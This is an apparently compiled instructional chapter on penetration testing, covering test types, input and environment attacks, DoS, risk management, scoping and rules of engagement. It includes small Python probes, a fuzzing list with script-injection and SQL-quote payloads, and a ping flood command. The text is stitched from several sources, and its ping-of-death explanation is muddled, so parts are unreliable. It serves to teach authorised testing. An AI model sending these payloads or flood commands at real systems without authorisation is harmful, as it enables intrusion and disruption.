1.1 Introduction
1.2 Types of Penetration Testing
1.3 Penetration Testing Risks
1.4 Social Engineering
1.5 Rules of Engagement
Penetration Testing
Penetration tests are a great way to identify vulnerabilities that exist in a system or network that has existing security measures in place. A penetration test usually involves the use of attack methods conducted by trusted individuals that are similar to those used by hostile intruders or hackers. Depending on the type of test that is conducted, this may involve a simple scan of IP addresses to identify machines that are offering services with known vulnerabilities, or even exploiting known vulnerabilities that exist in an unpatched operating system. The results of these tests or attacks are then documented and presented as a report to the owner of the system, and the vulnerabilities identified can then be resolved.

Bear in mind that a penetration test does not last forever. Depending on the organization conducting the tests, the time frame to conduct each test varies. A penetration test is basically an attempt to breach the security of a network or system and is not a full security audit. This means that it is no more than a view of a system's security at a single moment in time, during which the known vulnerabilities, weaknesses, or misconfigured systems have not changed.

Penetration testing is often done for two reasons: to increase upper management's awareness of security issues, or to test intrusion detection and response capabilities. It also assists higher management in decision-making processes. The management of an organization might not want to address all the vulnerabilities that are found in a vulnerability assessment, but might want to address the system weaknesses that are found through a penetration test. This can happen because addressing all the weaknesses found in a vulnerability assessment can be costly, and most organizations might not be able to allocate the budget to do this.

Penetration tests can have serious consequences for the network on which they are run. If badly conducted, a test can cause congestion and system crashes. In the worst-case scenario, it can result in exactly the thing it is intended to prevent: the compromise of the systems by unauthorized intruders. It is therefore vital to have consent from the management of an organization before conducting a penetration test on its systems or network.

A penetration test, occasionally called a pentest, is a method of evaluating the security of a computer system or network by simulating an attack from malicious outsiders (who do not have an authorized means of accessing the organization's systems) and malicious insiders (who have some level of authorized access). The process involves an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, both known and unknown hardware or software flaws, and
operational weaknesses in process or technical countermeasures. This analysis is carried out from the position of a potential attacker and can involve active exploitation of security vulnerabilities. Security issues uncovered through the penetration test are presented to the system's owner. Effective penetration tests will couple this information with an accurate assessment of the potential impacts to the organization and outline a range of technical and procedural countermeasures to reduce risks.

Web applications are widely used to provide functionality that allows companies to build and maintain relationships with their customers. The information stored by web applications is often confidential and, if obtained by malicious attackers, its exposure could result in substantial losses for both consumers and companies. Recognizing the rising cost of successful attacks, software engineers have worked to improve their processes to minimize the introduction of vulnerabilities. In spite of these improvements, vulnerabilities continue to occur because of the complexity of web applications and their deployment configurations. The continued prevalence of vulnerabilities has increased the importance of techniques that can identify vulnerabilities in deployed web applications. One such technique, penetration testing, identifies vulnerabilities in web applications by simulating attacks by a malicious user. Although penetration testing cannot guarantee that all vulnerabilities will be identified in an application, it is popular among developers for several reasons: (i) it generally has a low rate of false vulnerability reports, since it discovers vulnerabilities by exploiting them; (ii) it tests applications in context, which allows for the discovery of vulnerabilities that arise due to the actual deployment environment of the web application; and (iii) it provides concrete inputs for each vulnerability report that can guide the developers in correcting the code.

Although individual penetration testers perform a wide variety of tasks, the general process can be divided into three phases: information gathering, attack generation, and response analysis. Figure 1 shows a high-level overview of these three phases. In the first phase, information gathering, penetration testers select a target web application and obtain information about it using various techniques, such as automated scanning, web crawling, and social engineering. The results of this phase allow penetration testers to perform the second phase, attack generation, which is the development of attacks on the target application. Often this phase can be automated by customizing well-known attacks or by using automated attack scripts. Once the attacks have been executed, penetration testers perform response analysis: they analyze the application's responses to determine whether the attacks were successful and prepare a final report about the discovered vulnerabilities.

During information gathering, the identification of an application's input vectors (IVs), i.e., points in an application where an attack may be introduced (such as user-input fields and cookie fields), is of particular importance. Better information about an application's IVs generally leads to more thorough penetration testing of the application. Currently, it is common for penetration testers to use automated web crawlers to identify the IVs of a web application. A web crawler visits the HTML pages generated by a web application and analyzes each page to identify potential IVs.
The main limitation of this approach is that it is incomplete: web crawlers are typically unable to visit all of the pages of a web application, since certain values must be provided to the web application in order to cause additional HTML pages to be shown. Although penetration testers can make use of the information discovered by web crawlers, the incompleteness of such information means that a potentially large number of vulnerable IVs can remain undiscovered. Another challenging aspect of penetration testing is determining whether an attack is successful. This task is complex because a successful attack often produces no observable behavior (i.e., it may produce a side effect that is not readily visible in the HTML page produced by the web application) and requires manual, time-consuming analysis to be identified. Existing approaches to automated response analysis tend to suffer from imprecision because they are based on simple heuristics.
Figure 1: High-level overview of the three phases of penetration testing (information gathering, attack generation, and response analysis).
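To make the information-gathering phase concrete, here is a minimal sketch of crawler-style IV discovery in Python: it fetches a single page and lists form fields and cookie names as candidate input vectors. The URL is a placeholder, and a real crawler would also follow links and handle sessions; this is an illustration, not a complete tool.

# Minimal IV-discovery sketch; the target URL is hypothetical.
import urllib.request
from html.parser import HTMLParser

class IVParser(HTMLParser):
    """Collects form fields as candidate input vectors."""
    def __init__(self):
        super().__init__()
        self.input_vectors = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.input_vectors.append(("form", attrs.get("action", "")))
        elif tag in ("input", "textarea", "select"):
            self.input_vectors.append((tag, attrs.get("name", "")))

url = "http://testsite.example/login"   # placeholder target
with urllib.request.urlopen(url) as resp:
    html = resp.read().decode("utf-8", errors="replace")
    cookies = resp.headers.get_all("Set-Cookie") or []

parser = IVParser()
parser.feed(html)

for kind, name in parser.input_vectors:
    print(f"IV ({kind}): {name}")
for c in cookies:                        # cookie fields are IVs too
    print(f"IV (cookie): {c.split('=', 1)[0]}")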
The services offered by penetration testing firms span a similar range, from a simple scan of an organization's IP address space for open ports and identification banners to a full audit of source code for an application. Penetration testing is one of the oldest methods for assessing the security of a computer system. The idea behind penetration testing methodologies is that the penetration tester should follow a pre-scripted format during the test, as dictated by the methodology. A penetration testing methodology was proposed in this research. It is also important to consider a policy that should be followed by both the tester and the client to reduce financial and confidentiality disputes and to bring conformity to the operations between both parties, so this research suggests a policy that should be followed by penetration testers and clients of the penetration tests. Penetration testing is increasingly used by organizations to assure the security of information systems and services, so that security weaknesses can be fixed before they get exposed. But when the penetration test is performed without a well-planned and professional approach, it can result in exactly what it is supposed to prevent. In order to protect company data, companies often take measures to guarantee the availability, confidentiality, and integrity of data, or to ensure access for authorized persons only.
Outsourcing
Outsourcing penetration testing can be a very costly exercise and one that you might want to perform only once a year. The problem with most networks is that they are constantly changing. People move equipment around the office or between office locations and also install software on PCs and servers, so penetration testing only gives you a snapshot of compromised systems at that moment in time, as a guide. You also have to be extra vigilant when employing a security testing company. You need to make sure they have liability insurance! Do they come with certified security credentials? Do they bait and switch? Or do they employ real-life hackers who have their own agenda?
Some industries and types of data are regulated and must be handled securely (like the financial sector, or credit-card data). In this case your regulator will insist on a penetration test as part of a certification process. You may be a product vendor (like a web developer), and your client may be regulated, so will ask you to have a penetration test performed on their behalf. You may suspect (or know) that you have already been hacked, and now want to find out more about the threats to your systems, so that you can reduce the risk of another successful attack.
You may simply think it is a good idea to be proactive, and find out about the threats to your organization in advance.
Business Advantages
1. Can be fast (and therefore cheap)
2. Requires a relatively lower skill-set than source code review
3. Tests the code that is actually being exposed
4. Saves hundreds of thousands of dollars in remediation and notification costs by avoiding network downtime and/or averting a single breach
5. Lowers the costs of security audits by providing comprehensive and detailed factual evidence of an enterprise's ability to detect and mitigate risks
6. Creates a heightened awareness of security's importance at the CXO management level
7. Provides unassailable information usable by audit teams gathering data for regulatory compliance
8. Provides a strong basis for supporting approval of larger security budgets
9. Provides support to evaluate the effectiveness of other security products, either deployed or under evaluation, to determine their ROI
IT / Technical Benefits

1. Allows IT staff to quickly and accurately identify real and potential vulnerabilities without being overburdened with numerous false-positive indicators
2. Allows IT staff to fine-tune and test configuration changes or patches to proactively eliminate identified risks
3. Assists IT in prioritizing the application of patches for reported known vulnerabilities
4. Enhances the effectiveness of an enterprise's SVM program
5. Provides vulnerability perspectives from both outside and within the enterprise
6. Acts as a force multiplier for overall impact on IT resources and significantly enhances the knowledge and skill level of IT staff
Blackbox Testing
Blackbox security testing is more commonly referred to as ethical hacking. Blackbox testing primarily focuses on the externally facing components of an application or network: what a potential hacker might see from the Internet. In a blackbox testing scenario, analysts are typically provided with little or no information about the target environment. Usually only a target website's address (URL) or a range of Internet addresses (IP addresses) is provided, although in the case of website or application targets, login credentials may also be supplied. In this way, blackbox testing more accurately simulates a real-world attack by a malicious hacker possessing zero or limited knowledge of the target site or network. Just like a hacker, analysts scan the target environment searching for all exploitable attack vectors.

While blackbox testing is a relatively quick and affordable way to determine whether an Internet-facing application or network is susceptible to various forms of attack, it comes with certain limitations. A blackbox test constitutes the bare minimum level of security analysis. Blackbox testing won't identify every vulnerability that becomes exploitable once a hacker has breached the perimeter, nor will it yield an exhaustive list of the individual instances of each vulnerability that becomes exposed once a hacker has gained initial access to the target environment. Finally, blackbox testing is conducted for a limited duration, whereas true hackers have no such time restrictions, which is a significant difference given current Intrusion Prevention System (IPS) technologies. Therefore, the benefits and limitations of blackbox penetration testing need to be understood: this is not a comprehensive test of website, application, or network security, but rather an initial assessment of that system's perimeter integrity.
Graybox Testing
Graybox penetration testing is also sometimes referred to as informed penetration testing or assisted blackbox testing. This method of testing is similar to blackbox penetration testing; however, the analysts are given detailed information about the application or network, such as network architecture diagrams or access to the application source code. These details aid analysts in finding and verifying vulnerabilities they might have missed with a blackbox test. Graybox penetration testing provides a more thorough assessment of the target site or network's security, discovering vulnerabilities that are only visible once inside that environment, rather than just those facing the Internet. In a graybox application penetration test, the analyst tests the strength of the existing security controls as an insider, looking for vulnerabilities from the perspective of a trusted user with detailed knowledge of the environment. Upon successful login, the analyst sends malicious input to the application manually or by using special tools to determine how the application responds:
Does the application provide an entry-point to other resources, servers, or databases?
Does the application provide useful information to take advantage of other attack vectors?
Does the application allow a user to perform an unauthorized escalation of their access?
Another value of graybox testing is that analysts are able to work directly with network and/or development teams to pinpoint the exact location of vulnerabilities: the actual lines in the source code, or the insecure network settings and configurations. Conversely, in a blackbox test, the vulnerability could be demonstrated but its source might go unidentified. With a graybox test, a client company receives detailed information on the individual instances of vulnerabilities and their locations. With both blackbox and graybox testing, AsTech provides remediation recommendations and risk ratings based on the unique risk evaluation criteria most appropriate for each client.
An effective security program integrates multiple approaches, combining penetration testing with other types of assessment, such as application security code review, architecture review, and threat modeling. When performed in combination, these assessments provide a more comprehensive picture of the overall security posture of the target environment.
Environment Attacks
Software does not execute in isolation. It relies on any number of binaries and code-equivalent modules, such as scripts and plug-ins. It may also use configuration information from the registry or file system, as well as databases and services that may reside anywhere. Each of these environmental interactions may be the source of a security breach and therefore must be tested. There are also a number of important questions you must ask about the degree of trust that your application has in these interactions, including the following: How much does the application trust its local environment and remote resources? Does the application put sensitive information in a resource (for instance, the registry) that can be read by other applications? Does it trust every file or library it loads without verifying the contents? Can an attacker exploit this trust to force the application to do his bidding? In addition to the trust questions, penetration testers should watch for DLLs that might be faulty or that have been replaced (or modified) by an attacker, and for binaries or files with which the application interacts that are not fully protected by access control lists (ACLs) or are otherwise unprotected. Testers must also be on the lookout for other applications that access shared memory resources or store sensitive data in the registry or in temporary files. Finally, testers must consider factors that create system stress, such as a slow network, low memory, and so forth, and determine the impact of these factors on security features. Environment attacks are often conducted by rigging an insecure environment and then executing the application within that environment to see how it responds. This is an indirect form of testing; the attacks are waged against the environment in which the application is operating. Now let's look at direct testing.
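As a concrete illustration of rigging checks against an insecure environment, the sketch below (a minimal example, assuming a POSIX host and a hypothetical install directory) walks an application's directory tree and flags world-writable files and group-writable libraries of the kind an attacker could replace. Checking Windows ACLs would need platform-specific APIs instead.

# Flag loosely protected files in an application's install directory.
# APP_DIR is a placeholder; adjust for the application under test.
import os
import stat

APP_DIR = "/opt/example-app"   # hypothetical application directory

for root, _dirs, files in os.walk(APP_DIR):
    for name in files:
        path = os.path.join(root, name)
        mode = os.stat(path).st_mode
        if mode & stat.S_IWOTH:          # writable by any user at all
            print(f"[!] world-writable: {path}")
        if name.endswith((".so", ".dll")) and mode & stat.S_IWGRP:
            print(f"[?] group-writable library: {path}")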
Input Attacks
In penetration testing, the subsets of inputs that come from untrusted sources are the most important. These include communication paths such as network protocols and sockets, exposed remote functionality
such as DCOM, remote procedure calls (RPCs) and Web services, data files (binary or text), temporary files created during execution, and control files such as scripts and XML, all of which are subject to tampering. Finally, UI controls allowing direct user input, including logon screens, Web front ends, and the like, must also be checked. Specifically, we will want to determine whether input is properly controlled: are good inputs allowed in and bad ones (such as long strings, malformed packets, and so forth) kept out? Suitable input checking and file parsing are critical. You'll need to test to see whether dangerous input can be entered into UI controls, and find out what happens when it is. This includes special characters, encoded input, script fragments, format strings, escape sequences, and so forth. You'll need to determine whether long strings that are embedded in packet fields or in files and are capable of causing memory overflow will get through. Corrupt packets in protocol streams are also a concern. You must watch for crashes and hangs and check the stack for exploitable memory corruption. Finally, you must ensure that such things as validation and error messages happen in the right place (on the server side rather than only on the client side, which an attacker can bypass) as a proper defense against bad input. Input attacks really are like lobbing grenades against an application. Some of them will be properly parried and some will cause the software to explode. It's up to the penetration team to determine which are which and initiate appropriate fixes.
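A minimal sketch of this kind of input attack is shown below, assuming a hypothetical search endpoint on the target. It URL-encodes a handful of classic hostile inputs (long strings, format strings, script fragments) and watches for server errors, which often indicate improperly parried input. Real fuzzing would use far larger input sets and also monitor the target process for crashes and hangs.

# Lob a few "grenades" at one input vector; the endpoint is hypothetical.
import urllib.error
import urllib.parse
import urllib.request

TARGET = "http://testsite.example/search?q="   # placeholder endpoint

payloads = [
    "A" * 10000,                 # long string / overflow probe
    "%s%s%s%n",                  # format string
    "<script>alert(1)</script>", # script fragment
    "\x00\xff\xfe",              # raw control bytes
    "'\" OR 1=1 --",             # quote/escape handling
]

for p in payloads:
    url = TARGET + urllib.parse.quote(p)
    try:
        urllib.request.urlopen(url, timeout=10).read()
    except urllib.error.HTTPError as e:
        if e.code >= 500:        # server error: likely unhandled input
            print(f"[!] HTTP {e.code} for payload {p[:20]!r}")
    except Exception as e:       # timeouts/resets hint at hangs or crashes
        print(f"[?] {type(e).__name__} for payload {p[:20]!r}")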
Denial of Service

Denial of service is the primary example of this category, but certainly not the most dangerous.
Denial of service attacks can be successful when developers have failed to plan for a large number of users (or connections, files, or whatever inputs cause some resource to be taxed to its limit). However, there are far more insidious logical defects that need to be tested. For example, information disclosure can happen when inputs that drive error messages and other generated outputs reveal exploitable information to an attacker. One practical example of such data that you should always remove is any hardcoded test accounts or test APIs (which are often included in internal builds to aid test automation). These can
provide easy access to an attacker. Two more tests you should run are to input false credentials to determine whether the internal authorization mechanisms are robust, and to choose inputs that vary the code paths. Often one code path is secure, but the same functionality can be accessed in a different way, which could inadvertently bypass some crucial check.
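The false-credentials test can be sketched as follows, against a hypothetical login endpoint. The idea is that the two rejection messages should be indistinguishable; if they differ, the application discloses which usernames exist, even though both logins were correctly refused.

# Compare error responses for a bad username vs. a bad password.
# The LOGIN URL and field names are placeholders.
import urllib.error
import urllib.parse
import urllib.request

LOGIN = "http://testsite.example/login"   # hypothetical endpoint

def attempt(user, password):
    data = urllib.parse.urlencode({"user": user, "pass": password}).encode()
    try:
        with urllib.request.urlopen(LOGIN, data=data, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.read().decode(errors="replace")

msg_bad_user = attempt("no_such_user_xyz", "x")
msg_bad_pass = attempt("admin", "definitely-wrong")

# Differing messages are an information disclosure defect: an attacker
# can enumerate valid usernames even though both logins were rejected.
if msg_bad_user != msg_bad_pass:
    print("[!] error messages differ: possible username enumeration")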
Ping of death
Ping of death is another type of DoS attack that can shut down systems and cause great harm. The default ICMP echo packet size is 64 bytes, and many computer systems could not handle an incoming packet larger than the maximum IP packet size of 65,535 bytes. In a ping of death attack, an attacker generates ICMP echo packets of over 65,535 bytes, which is illegal. Normally you would ping a host like this:

ping 192.168.1.1

What would happen if you did this instead?

ping 192.168.0.1 -l 65500 -n 10000

This, in effect, pings the target machine 192.168.0.1 continuously (10,000 times) with roughly 64 KB of data per request.
Distributed DOS
A distributed denial of service attack, or DDoS attack, is an attack in which an attacker uses several machines to launch a DoS attack, which is why it is difficult to handle. In a DDoS attack, multiple compromised systems that are already infected are used against the victim computer. In this case it is difficult to track the attacker, because the attack is generated from several IP addresses and is difficult to block.
Overall Defense
There is no single way to prevent DoS attacks because of their varying nature, but there are some effective ways to avoid them and to reduce their effect:

Install and maintain anti-virus software.
Install a firewall, and configure it to restrict traffic coming into and leaving your computer (Firewall, Firewall 2).
Don't Be Deterred
Penetration testing is very different from traditional functional testing; not only do penetration testers lack appropriate documentation, but they also must be able to think like users who intend to do harm. This point is very important: developers often operate under the assumption that no reasonable user would execute a particular scenario, and therefore decline a bug fix. But you really can't take chances like that. Hackers will go to great lengths to find vulnerabilities, and no trick, cheat, or off-the-wall test case is out of bounds. The same must be true for penetration testers as well.
Risk is a measure of probability and severity of unwanted effects on software development projects.
The current strategies for evaluating or validating IT systems and network security are focused on examining the results of security assessments (including red-teaming exercises, penetration testing, vulnerability scanning, and other means of probing defenses for weaknesses in security), and on examining the building blocks, processes, and controls (for example: auditing business processes and procedures for security policy compliance, assessing the quality of security in infrastructure components, and reviewing system development and administration processes for security best practices).
Risk
Every organization has a mission. In this digital era, as organizations use automated information technology (IT) systems to process their information for better support of their missions, risk management plays a critical role in protecting an organization's information assets, and therefore its mission, from IT-related risk. An effective risk management process is an important component of a successful IT security program. The principal goal of an organization's risk management process should be to protect the organization and its ability to perform its mission, not just its IT assets. Therefore, the risk management process should not be treated primarily as a technical function carried out by the IT experts who operate and manage the IT system, but as an essential management function of the organization.

Risk is the net negative impact of the exercise of a vulnerability, considering both the probability and the impact of occurrence. Risk management is the process of identifying risk, assessing risk, and taking steps to reduce risk to an acceptable level. This guide provides a foundation for the development of an effective risk management program, containing both the definitions and the practical guidance necessary for assessing and mitigating risks identified within IT systems. The ultimate goal is to help organizations better manage IT-related mission risks.
The risk exposure due to an unwanted event can be quantified as

V(UE) = P(UE) * I(UE)          (1.a)

where UE stands for an unwanted event (risk factor), P(UE) is the probability that UE occurs, and I(UE) stands for the impact (or cost) due to the occurrence of UE. As an example, consider the following situation: UE = {resignation of a senior analyst}, I(UE) = {6 months delay}, and P(UE) = 0.25; then V(UE) = 6 * 0.25 = 1.5 (months).
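As a minimal illustration of formula (1.a), the helper below reproduces the senior-analyst example; the function name is ours, not from the source.

def risk_exposure(p_ue, i_ue):
    """V(UE) = P(UE) * I(UE): probability times impact."""
    return p_ue * i_ue

# Resignation of a senior analyst: P = 0.25, I = 6 months of delay
print(risk_exposure(0.25, 6))   # -> 1.5 (months)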
Identify: Includes the identification of the internal and external sources of risk through a suitable taxonomy (Higuera, 1996) (SEI, 2002), as depicted in Table 1. Risk identification involves stakeholders and depends on the project context.
Analyze: Aims at understanding when, where, and why risk might occur, through direct queries to stakeholders about the probability and impact of risk elements. The prior probability is evaluated: this is the probability that an event (e.g., a project delay) could happen, assessed before the project starts and calculated from prior information.
Plan: In order to establish a strategy to avoid or mitigate the risk, decisions have to be made. In this stage, contingency plans are stated, as well as the related triggering thresholds. Risk-controlling actions are defined and selected.
Figure 1: Risk Management Process. (The figure shows the stages Identify, Analyze, Plan, Handle, Monitoring, and Control, with Document and Communicate at the core.)
Handle: The planned actions are carried out if the risk occurs.
Monitoring: This is a continuous activity that watches the status of the project and checks performance indicators (e.g., quality indicators, for instance the number of defects per size unit). In this stage, data concerning the risk trend is gathered.
Control: Appraises the corrections to be made to the risk mitigation plan in case of deviations. If the indicators show an increase over the fixed threshold, a contingency plan is triggered. In our opinion, this stage should deal with the posterior probability, because events have already occurred; that is, one tries to figure out whether an unwanted event actually had an impact on project objectives.
Document and Communicate: This stage can truly be considered the core of RM; in fact, all other stages refer to Documentation and Communication for enabling information exchange.
Strict practices include never allowing access to any systems or any restricted area to anyone without proper verification. Reinforcing strict security practices such as these could one day mean a corporate America that is impervious to social engineering attacks, but that is nowhere visible, even in the distant future. Questions to answer during scoping include:

1. Will the client provide e-mail addresses of personnel that we can attempt to social engineer?
2. Will the client provide phone numbers of personnel that we can attempt to social engineer?
3. Will we be attempting to social engineer physical access?
4. If so, how many people will be targeted?
It should be noted that, as part of different levels of testing, the questions for business unit managers, systems administrators, and help desk personnel may not be required. However, feel free to use the following questions as a guide.
Validate Ranges
It is imperative that before you start to attack the targets, you validate that they are in fact owned by the customer you are performing the test against. Think of the legal consequences you may run into if you start attacking a machine and successfully penetrate it, only to find out later down the line that the machine actually belongs to another organization (such as a hospital or government agency). To verify that the targets actually belong to your customer, you can perform a whois lookup against them. To do so, you can either use a whois tool on the web, such as Internic, or a tool on your computer like the following:
user@unix:~$ whois example.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: example.COM
   Registrar: REGISTER.COM, INC.
   Whois Server: whois.register.com
   Referral URL: http://www.register.com
   Name Server: NS1.EXAMPLE.COM
   Name Server: NS3.EXAMPLE.COM
   Status: clientTransferProhibited
   Updated Date: 17-mar-2009
   Creation Date: 05-mar-2000
   Expiration Date: 05-mar-2016

Registrant:
   Domain Discreet
   ATTN: example.com
   Rua Dr. Brito Camara, n 20, 1
   Funchal, Madeira 9000-039
   PT
   Phone: 1-902-7495331
   Email: [email protected]

Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com

Domain Name: example.com
Created on..............: 2000-03-05
Expires on..............: 2016-03-05

Administrative Contact:
   Domain Discreet
   ATTN: example.com
   Rua Dr. Brito Camara, n 20, 1
   Funchal, Madeira 9000-039
   PT
   Phone: 1-902-7495331
   Email: [email protected]

Technical Contact:
   Domain Discreet
   ATTN: example.com
   Rua Dr. Brito Camara, n 20, 1
   Funchal, Madeira 9000-039
   PT
   Phone: 1-902-7495331
   Email: [email protected]
Cloud Services
The single biggest issue with testing cloud services is that data from multiple different organizations is stored on one physical medium. Often the security between these different data domains is very lax. The cloud service provider needs to be alerted to the testing, needs to acknowledge that the test is occurring, and must grant the testing organization permission to test. Further, there needs to be a direct security contact within the cloud service provider who can be reached in the event that a security vulnerability is discovered that could impact the other cloud customers. Some cloud providers have specific procedures for penetration testers to follow, and may require request forms, scheduling, or explicit permission from them before testing can begin. This may seem like an onerous amount of approval for testing; however, the risks to the tester are too great otherwise.
ISP
Verify the ISP terms of service with the customer. In many commercial situations the ISP will have specific provisions for testing. Review these terms carefully before launching an attack. There are situations where ISPs will shun and block certain traffic that is deemed to be malicious. This may or may not be acceptable to the customer; either way, it needs to be clearly communicated with the customer prior to testing.
Web Hosting
As with the other tests, the scope and timing of the test need to be clearly communicated with the web hosting provider. Also, when communicating with the direct customer, you need to clearly articulate that you are only testing for web vulnerabilities; you will not be testing for vulnerabilities that could lead to a compromise of the underlying OS infrastructure.
MSSPs
Managed Security Service Providers (MSSPs) may also need to be notified of testing. Specifically, you will need to notify the provider when you are testing systems and services that they own. However, there are times when you would not notify the MSSP: for example, it may not be in the best interests of the test to notify the MSSP when you are testing the MSSP's response time. As a general rule of thumb, any time a device or service explicitly owned by the MSSP is being tested, they need to be notified.
DoS Testing
Stress testing or Denial of Service testing should be discussed before you start your engagement. It can be one of those topics that many organizations are uncomfortable with due to the potentially damaging nature of the testing. If an organization is only worried about the confidentiality or integrity of their data, stress testing may not be necessary; however, if the organization is also worried about the availability of their services, then the stress testing should be conducted in a non-production environment that is identical to their production environment.
Goals
Every penetration test should be goal oriented. This is to say we are testing to identify specific vulnerabilities that lead to a compromise of the business or mission objectives of the customer. It is not about finding un-patched systems. It is about identifying risk that will adversely impact the organization.
Primary
The primary goal of a test should not be driven by compliance. There are a number of justifications for this reasoning. First, compliance does not equal security. While it should be understood that many organizations undergo testing because of compliance, it should not be the main goal of the test. For example, you may be hired to test as part of a PCI requirement, and there are many companies that process credit card information. However, the traits that make your target organization unique and viable in a competitive market would have the greatest impact on the target organization if they were compromised. Compromising credit cards would be bad; compromising the email addresses and credit card numbers of all the target organization's customers would be catastrophic.
Secondary
The secondary goals are the ones that are directly related to compliance. Usually these are tied very tightly to the primary goals. For example, getting the credit cards is the secondary goal; tying that breach of data to the business or mission drivers of the organization is the primary goal. Think of it like this: secondary goals mean something for compliance and IT; primary goals get the attention of the CXOs.
Business Analysis
Before performing a penetration test it is a good idea to define what level of security maturity your customer is at. There are a number of organizations that choose to jump directly into a penetration test without any level of security maturity. For these customers it is often a good idea to perform a vulnerability analysis first. There is absolutely no shame in doing Vulnerability Analysis (VA) work. Remember, the goal is identifying risks to your target organization. It is not about being a tester. If a company is not ready for a full penetration test, they will most likely get far more value out of a good VA than a penetration test. Establish with the customer what information about the systems they want you to know in advance. You may also want to ask them for information about vulnerabilities they already know about; this will save you time and save them money if you don't have to re-discover and report on what
they already knew. A full or partial white-box test may bring the customer more value than a black-box test, if it isn't absolutely required by compliance. If you are asked to pentest an internal network (and you really should be -- assume the attacker started on the inside or is already there), you will need to gather more information about scope.
This chapter covers: Section 2.1, Steps of Penetration Testing; Section 2.2, Pentest Tools; and Section 2.3, Advantages and Disadvantages of Pentesting.
2.1 Steps of Penetration Testing
Pre-engagement Interactions
Intelligence Gathering
Threat Modeling
Vulnerability Analysis
Exploitation
Post Exploitation
Reporting
Pre-engagement Interactions
This phase defines all the pre-engagement activities and scope definitions.
Scoping
Scoping is arguably one of the more important and often overlooked components of a penetration test. Sure, there are lots of books written about the different tools and techniques that can be used for gaining access to a network. However, there is very little on the topic of how to prepare for a test. This can lead to trouble for testers in areas like scope creep, legal issues, and disgruntled customers who will never have you back. The goal of this section is to give you the tools and techniques to avoid these pitfalls. Much of the information contained in this section is the result of the experiences of the testers who wrote it; many of the lessons are ones we learned the hard way.
Scoping is specifically tied to what you are going to test. This is very different from covering how you are going to test; we will be covering how to test in the Rules of Engagement section. If you are a customer looking for a penetration test, we strongly recommend going to the General Questions section of this document. It covers the major questions that should be answered before a test begins. Remember, a penetration test should not be confrontational. It should not be an activity to see if the tester can "hack" you. It should be about identifying the business risk associated with an attack. To get maximum value, make sure the questions in this document are covered. Further, as the scoping activity progresses, a good testing firm will start to ask additional questions tailored to your organization.
How to Scope
One of the key components for scoping an engagement is trying to figure out exactly how you as a tester are going to spend your time. For example, a customer could want you to test 100 IP addresses and only want to pay you $100,000 for the effort. This roughly breaks down to $1K per IP. Now, would that cost structure hold true if they had one mission critical application they wanted you to test? Some testers fall into this trap when interacting with a customer to scope a test. Unfortunately, there is going to be some customer education in the process. We are not WalMart. Our costs are not linear. So, with that being said, there will be some engagements where you will have a wide canvas of IP addresses to test and choose from to try and access a network as part of a test. There will also be highly focused tests where you will spend weeks (if not months) on one specific application. The key is knowing the difference. To have that level of understanding you will have to know what it is the customer is looking for, even when they don't know exactly how to phrase it.
What happens if you do not need the 20% overhead? It would be incredibly unethical to simply pocket the cash. Rather, find ways to provide the customer with additional value for the test. Walk the company's security team through the steps you took to exploit the vulnerability, provide an executive summary if it was not part of the original deliverable list, or spend some additional time trying to crack the vulnerability that was elusive during the initial testing. Another component of the metrics of time and testing is that your project has to have a definitive drop-dead date. All good projects have a beginning and an end. Your test should as well. If you've reached the specific date the testing is to end, or if any additional testing or work is requested of you after that date, you will need a signed Statement of Work specifying the work and the hours required. Some testers have a difficult time doing this because they feel they are being too much of a pain when it comes to cost and hours. However, it has been the experience of the author that if you provide exceptional value for the main test, the customer will not balk at paying you for additional work.
Rules of Engagement
While the scope defines what it is you are supposed to test, the rules of engagement define how testing is to occur. These are two different aspects that need to be handled independently from each other.

Timeline

You should have a clear timeline for your test. While in scope you defined start and end times, now it is time to define everything in between. We understand that the timeline will change as the test progresses; having a rigid timeline is not the goal of creating one. Rather, a timeline at the beginning of a test will allow you and your customer to more clearly identify the work that is to be done and the people that will be responsible for the work. We often use GANTT charts and work breakdown structures to define the work and the amount of time that each specific section of the work will take. Seeing the schedule broken down like this helps you identify the resources that need to be allocated, and it helps the customer identify possible roadblocks that may be encountered during testing. There are a number of free GANTT chart tools available on the Internet. Find one that works best for you and use it heavily when developing a testing road map. If nothing else, many managers resonate with these tools, and they may be an excellent medium for communicating with the upper management of a target organization.
Locations

It is also important to discuss with the customer the locations they will need you to travel to for testing. This could be something as simple as identifying local hotels, or as complex as identifying the laws of a specific target country. Sometimes an organization has multiple locations and you will need to identify a few sample locations for testing. In these situations, try to avoid having to travel to all customer locations; many times there are VPN connections available for testing.

Disclosure of Sensitive Information

While one of your goals may be to gain access to sensitive information, you may not actually want to view it or download it. This seems odd to newer testers; however, there are a number of situations where you do not want the target data on your system. For example, PHI: under HIPAA this data needs to be protected. In many situations your testing system may not have a firewall or AV running on it. This would be a good situation where you would not want PII anywhere near your computer. So the question becomes: how can I prove I had access without getting the data? There are a number of different ways you can prove access without showing data. For example, you can display a database schema, you can show permissions of systems you have accessed, or you can show the files without showing their content. The level of paranoia you want to employ for your tests is something you will need to decide with your customer. Either way, you will want to scrub your test machine of results in between tests. This also applies to the report templates you use. As a special side note, if you encounter illegal data (i.e., child pornography), immediately notify law enforcement, then your customer, in that order. Do not notify the customer first and take direction from them; simply viewing child pornography is a crime.

Evidence Handling

When handling evidence of a test and the differing stages of the report, it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests. Never hand out USB sticks with test reports at security conferences. And whatever you do, don't re-use a report from another customer engagement as a template! It is very unprofessional to leave references to another organization in your document.

Regular Status Meetings

Throughout the testing process it is critical to have regular meetings with the customer informing them of the overall progress of the test. These meetings should be held daily and should be as short as possible. We generally see our meetings cover three very simple things: plans, progress, and problems.
For plans, you should describe what you are planning on doing that day. The reason for this is to make sure you will not be testing during a change or an outage. For progress, you should report what you have completed since the previous meeting. For problems, you should communicate with the customer any issues that will impact the overall timing of the test. If there are specific people identified to rectify the situation, you should not discuss the solution during the status meeting; take the conversation offline. The goal is a meeting of 30 minutes or less, with any longer conversations taken offline with only the specific individuals required to solve the issue.

Time of Day to Test

For many customers there are better times of the day for testing than others. Unfortunately, this can mean many late nights for the penetration testers. Be sure that times of testing are clearly communicated with the customer before testing begins.

Dealing with Shunning
